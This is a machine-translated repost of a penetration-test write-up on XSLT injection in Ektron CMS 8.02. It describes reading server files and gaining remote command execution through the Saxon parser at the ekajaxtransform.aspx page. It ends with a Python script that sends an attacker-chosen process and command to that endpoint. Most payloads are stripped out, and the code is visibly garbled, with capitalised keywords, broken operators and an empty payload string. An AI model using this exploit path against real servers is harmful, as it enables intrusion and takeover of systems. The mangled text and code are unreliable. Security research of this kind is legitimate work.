Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Case Analysis of XSLT injection vulnerability

2025-03-31 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >

Share

Shulou(Shulou.com)06/01 Report--

This article mainly explains the "XSLT injection vulnerability case analysis", the content of the article is simple and clear, easy to learn and understand, the following please follow the editor's ideas slowly in depth, together to study and learn "XSLT injection vulnerability case analysis" bar!

XSLT injection vulnerability, which exists in the Saxon component of Ektron CMS 8.02, can be exploited by an attacker to cause SSRF or even RCE. But the researchers found that the exp on Metasploit seemed unexploitable and the vulnerability had been patched. Later, after groping, further information collection was done, and finally RCE was obtained.

Accidentally discover the attack surface

A foreign researcher was invited to do Web penetration testing for a large organization. After simple information collection, it is found that the Web application is relatively simple and has no obvious defects.

After further searching and testing, the researchers used dirbuster (directory scanner) to find an interesting JavaScript file. The application for viewing the contents of the file is: Ektron CMS 8.02.

After a simple search of the Internet, the researchers found some vulnerability information about the CMS on Microsoft Research Advisory:

... When Ektron Web CMS's XslCompiledTransform class processes user-controlled XSL data, it may lead to easy code execution.

Pages with vulnerabilities:

Https (s): / / host/WorkArea/ContentDesigner/ekajaxtransform.aspx

This page does exist for the target, and it may have vulnerabilities. Next, the researchers begin to enumerate the XSLT parsing engine on the target server, send a POST request through Burp, and insert the XSLT payload at Body:

Xslt=

Version:

Vendor:

Vendor URL:

Page feedback:

Version: 1

Vendor: Microsoft

Vendor URL: http://www.microsoft.com

Try a generic Exp

At this point, it has been indicated as a Microsoft XSLT parser. Then the researchers found a module on Metasploit that could be used for this attack. After setting the parameters, exploit, but no result is returned. It can be preliminarily judged that this vulnerability in the target application has been patched and cannot be exploited, but the researchers did not give up to view the request sent by Metasploit:

It's easy to see that it calls an interesting script:

Microsoft XSLT seems to run C #. Through scripting elements, you can embed C # malicious code in XSLT documents or other out-of-band extensions.

Construct a simple SSRF probe payload:

Xslt=

Feedback:

The use of scripts is prohibited. It can be activated through the XsltSettings.EnableScript property.

This seems to be the reason why Metasploit module attacks fail. Although clips are embedded in the element, the script is disabled and does not work. With this, you can determine that the vulnerability has been patched and that the attacker cannot obtain the RCE. But the researchers did not give up and began to further search for vulnerability information.

Dense willow trees and bright flowers

Looking up the data, the researchers found two research documents on XSLT injection attacks, the first in German, a more comprehensive introduction to such attacks, and the second from IOActive. After reading the relevant documentation, the researchers found that Ektron CMS actually comes with several XSLT parsers, one of which is called Saxon. Enumerate Saxon versions:

Xslt=

Version:

Vendor:

Vendor URL:

Feedback:

Version: 2.0

Vendor: SAXON 9.x.x.x from Saxonica

Vendor URL: http://www.saxonica.com/

The Saxon parser parses user input normally and provides feedback. Next, an attacker can try to read some files, enumerate information and even execute commands.

Read the file:

Asdf

Asdf

View the current directory:

Asdf

Asdf

View the current user and domain:

Asdf

Asdf

Attackers can now probe the server directory structure and read most files on the server, with the exception of SAM files, because the Web application user rights are insufficient.

Getshell

The researchers' ultimate goal is command execution, but there is no XSLT style available in the document. A closer look at the German document revealed that the Xalan processor could execute Java code, but the Saxon parser did not declare a namespace.

Try to construct the module and feedback the error.

After studying Saxonica documents, the researchers found that namespaces and some functions can be used to construct XSLT documents to execute commands:

Xslt=

.

It was later found that the namespace of the java was not declared:

Xmlns:java= "http://saxon.sf.net/java-type">

If the namespace is not declared, the processor cannot find an external object or script related to java:java.lang.Runtime.

Send the payload, the researcher can execute any command, and can connect to the Empire framework, at this point the web penetration part ends.

Use script

#! / usr/bin/python

Import httplib

Target = raw_input ("Enter the domain or IP address of target:

E.g. Www.google.com, or 198.162.0.1: "")

Port = raw_input ("" Enter port number of target

E.g. 80 or 443: ")

Process = raw_input ("Enter the process you wish to run:

Powershell.exe or cmd.exe: ")

Command = raw_input ("Enter command you wish to run:

E.g. Ping 127.0.0.1: "")

Def printText (txt):

Lines = txt.split ('\ n')

For line in lines:

Print line.strip ()

HttpServ = httplib.HTTPConnection (target, port)

HttpServ.connect ()

Payload = ""

Xslt=

""% (process,command)

Headers = {"Content-type": "application/x-www-form-urlend; charset=UTF-8", "Accept": "application/x-www-form-urlencoded; charset=UTF-8"}

HttpServ.request ('POST',' / WorkArea/ContentDesigner/ekajaxtransform.aspx', payload, headers)

Response = httpServ.getresponse ()

If response.status = = httplib.OK:

Print "Java Process Id:"

PrintText (response.read ())

HttpServ.close () Thank you for your reading, the above is the content of "XSLT injection vulnerability case Analysis". After the study of this article, I believe you have a deeper understanding of the XSLT injection vulnerability case analysis, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Internet Technology

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report